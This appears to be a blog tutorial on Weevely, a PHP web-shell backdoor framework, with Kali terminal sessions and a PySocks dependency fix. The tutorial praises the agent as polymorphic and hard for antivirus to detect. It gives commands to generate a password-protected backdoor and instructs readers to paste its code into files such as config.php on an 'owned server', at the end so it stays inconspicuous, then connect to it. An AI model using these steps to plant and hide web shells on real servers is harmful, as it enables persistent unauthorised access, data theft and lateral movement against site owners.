r00t

Weevely is a command line web shell dynamically extended over the network at runtime, designed for remote server administration and penetration testing.

Its terminal executes arbitrary remote code through the small footprint PHP agent that sits on the HTTP server. Over 30 modules shape an adaptable web administration and post-exploitation backdoor for access maintenance, privilege escalation and network lateral movement, even in restricted environment.

Read the Wiki for tutorials and uses cases.

The framework features:

  • Ssh-like terminal
  • SQL console pivoted on target
  • HTTP proxy pivoted on target
  • Host configuration security auditing
  • Mount of the remote filesystem
  • Network scan pivoted on target
  • File upload and download
  • Reverse and direct TCP shell
  • Meterpreter support
  • Service account bruteforce
  • Compressed archive management

The backdoor agent

The remote agent is a small PHP script which can extend its functionality over the network at run-time. The agent code is polymorphic and hardly detectable by AV and the traffic is obfuscated within the HTTP requests.

root@kali:~# weevely
[+] weevely 3.2.0
[!] Error: too few arguments
[+] Run terminal to the target
weevely <URL> <password> [cmd]
[+] Load session file
weevely session <path> [cmd]
[+] Generate backdoor agent
weevely generate <password> <path>
root@kali:~# 

weevely Usage Example

Generate a PHP backdoor (weevely.php) protected with the given password (pass).

root@kali:~# weevely generate pass /root/Desktop/weevely.php
Generated backdoor with password 'pass' in '/root/Desktop/weevely.php' of 1466 byte size.

Now generated backdoor is available on our provided path /root/Desktop/weevely.php. Open it with some text editor and copy all code of this weevely.php. Now go back to your owned server and open some file that you want to backdoor. For example, i want to backdoor config.php, config.inc.php, connection.php etc. Now open each file and paste this code at the end or start of that PHP file.(I would recommend pasting at the end of file, because it will make your injected backdoor a little bit anonymous).Now server is backdoored. Lets test it with our weevely tool. Open termial or cmd and connect to those backdoored files using following weevely command.

root@kali:~# weevely http://127.0.0.1/shells/weevely.php pass

Fix Weevely dependencies in Kali Linux

If you ever run in to this error when trying to connect to a php web shell with weevely, here’s the simple fix.

root@kali:~/Desktop/Sidney# weevely http://127.0.0.1/shells/weevely.php pass
Traceback (most recent call last):
  File "./weevely.py", line 98, in <module>
    main(arguments)
  File "./weevely.py", line 48, in main
    modules.load_modules(session)
  File "/usr/share/weevely/core/modules.py", line 24, in load_modules
    (module_group, module_name), fromlist=["*"]
  File "/usr/share/weevely/modules/shell/php.py", line 4, in <module>
    from core.channels.channel import Channel
  File "/usr/share/weevely/core/channels/channel.py", line 8, in <module>
    import sockshandler
ImportError: No module named sockshandler

According to the error, python can’t import sockshandler, OH NO! Steps to recovery: Download the latest build of PySocks HERE.Unzip, build and install.

root@kali:~/Downloads# tar -xf PySocks-1.6.6.tar.gz
root@kali:~/Downloads# chmod +x PySocks-1.6.6/setup.py
root@kali:~/Downloads# cd PySocks-1.6.6/
root@kali:~/Downloads/PySocks-1.6.6# ./setup.py build
running build
running build_py
creating build
creating build/lib.linux-x86_64-2.7
copying socks.py -> build/lib.linux-x86_64-2.7
copying sockshandler.py -> build/lib.linux-x86_64-2.7
root@kali:~/Downloads/PySocks-1.6.6# ./setup.py install
running install
running build
running build_py
running install_lib
copying build/lib.linux-x86_64-2.7/sockshandler.py -> /usr/local/lib/python2.7/dist-packages
copying build/lib.linux-x86_64-2.7/socks.py -> /usr/local/lib/python2.7/dist-packages
byte-compiling /usr/local/lib/python2.7/dist-packages/sockshandler.py to sockshandler.pyc
byte-compiling /usr/local/lib/python2.7/dist-packages/socks.py to socks.pyc
running install_egg_info
Writing /usr/local/lib/python2.7/dist-packages/PySocks-1.6.6.egg-info

Now try weevely again:

root@kali:~/Desktop/Sidney# weevely http://127.0.0.1/shells/weevely.php pass
[+] weevely 3.2.0
[+] Target: 192.168.1.10
[+] Session: /root/.weevely/sessions/127.0.0.1/weevely_1.session
[+] Browse the filesystem or execute commands starts the connection
[+] to the target. Type :help for more information.

WIN!!!

Modules development

Weevely also provides python API to develop your own module to implement internal audit, account enumerator, sensitive data scraper, network scanner, make the modules work as a HTTP or SQL client and do a whole lot of other cool stuff.

Download Weevely 3 from HERE